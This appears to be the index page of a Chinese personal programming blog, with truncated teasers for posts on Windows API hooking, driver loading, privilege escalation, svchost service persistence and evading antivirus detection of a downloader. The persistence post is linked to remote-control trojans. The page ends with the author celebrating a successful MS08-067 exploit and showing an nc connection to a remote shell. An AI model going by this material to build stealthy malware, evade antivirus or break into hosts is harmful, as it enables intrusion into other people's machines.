BlackFeather'S Blog我的技术小博 -- C/C++,Python,Golang

空间买的XXX（不做广告）的，一年30、40块，没有IIS并发数限制和流量限制，速度还可以，挺爽的。前一段时间结果空间被“和谐”了，给我的理由域名没有备案，不准绑定。我那个郁闷，不就是一个小小博客么，犯得着这么扯淡么。。。跟管理员扯淡了半天还是无果。。。无奈了，找了5944免费空间传说中的美国空间，可以随便绑定域名。OK，终于可以再次开张了。。。

唉，开一个网站真是难啊。。。

忙补考，科研立项，学生会网站建设等等，累死了......（还没有RMB，更郁闷）

3.28日考计算机四级，然后开始“计算机病毒防火墙的开发工作”！

最近在搞API HOOK的相关操作，收集了一个很牛的模块，不敢独享，发出来！

可能有人看出来了这个不是VB，呵呵确实，这个就是传说中的powerbasic

调用方式，先  #INCLUDE "HookApi.Inc" ，然后···发个例子吧

#COMPILE EXE
#DIM ALL
...

More...

使用VB来加载驱动，不多解释了。用的是最简单，最原始的注册表加载的方法。

代码如下：

Option Explicit

Private Const STATUS_IMAGE_ALREADY_LOADED = 
Private Const HKEY_CLASSES_ROOT = 
...

More...

现在杀毒软件对URLDOWNTOFILEA这个API查的是越来越严了，无论我怎么加密，动态调用等等就是被查出来。哎，我还不会很底层的东西，老老实实使用wininet的API写了一个下载的FUNCTION。感觉倒是很爽！

简单列一下遇到的主要问题：

1、InternetReadFile这个函数原型是

Declare Function InternetReadFile Lib "wininet.dll" (ByRef hFile As Long,ByVal sBuffer As String, ByVal dwNumberOfBytesToRead As Long, ByRef lpdwNumberOfBytesRead As Long)as integer

...

More...

建立svchost.exe启动的服务现在貌似很流行，黑洞，gh0st和我们小组的远控都是这种方式，主要是隐蔽性高。我发出来替换服务的方式添加，现在VB版的正在写，就是遇到了点问题，比较恶心，很快就能解决，写完了第一时间发出来！

DELPHI代码如下：

{安装单元
完成进度：服务安装
日期：2008，9，16
作者：Lenk（L.S.T）}
...

More...

普通用户建立SYSTEM权限的进程，在桌面扔了好久了，发出来晾晾！

代码如下：

 clsHookInfo.cls

VERSION 1.0 CLASS
BEGIN
  MultiUse = -1  'True
...

More...

原文地址:http://blog.csdn.net/chenhui530/archive/2008/10/21/3119107.aspx  作者：chenhui530(大仙级人物)

 最近才发现的“RtlCreateUserThread”(下步调用ZwCreateThread)这可是个好东西，可以创建远程线程，也可以用来写多线程程序，但是在VB里好像还是不是很稳定只能用API。

More...

都应该知道SSDT是什么东西了，不多废话了，在VBGOOD上发现的

200811092338504748.gz

这几天沸沸扬扬的MS08067漏洞，终于在不经意间发现了利用工具，晚上测试一不小心就成功了！有生以来第一次溢出成功，太他妈的激动了，大吼到嗓子哑了！！！！！

C:\Documents and Settings\Administrator>nc -vv 10.1.12.48 4444
PC-200810152207 [10.1.12.48] 4444 (?) open
...

More...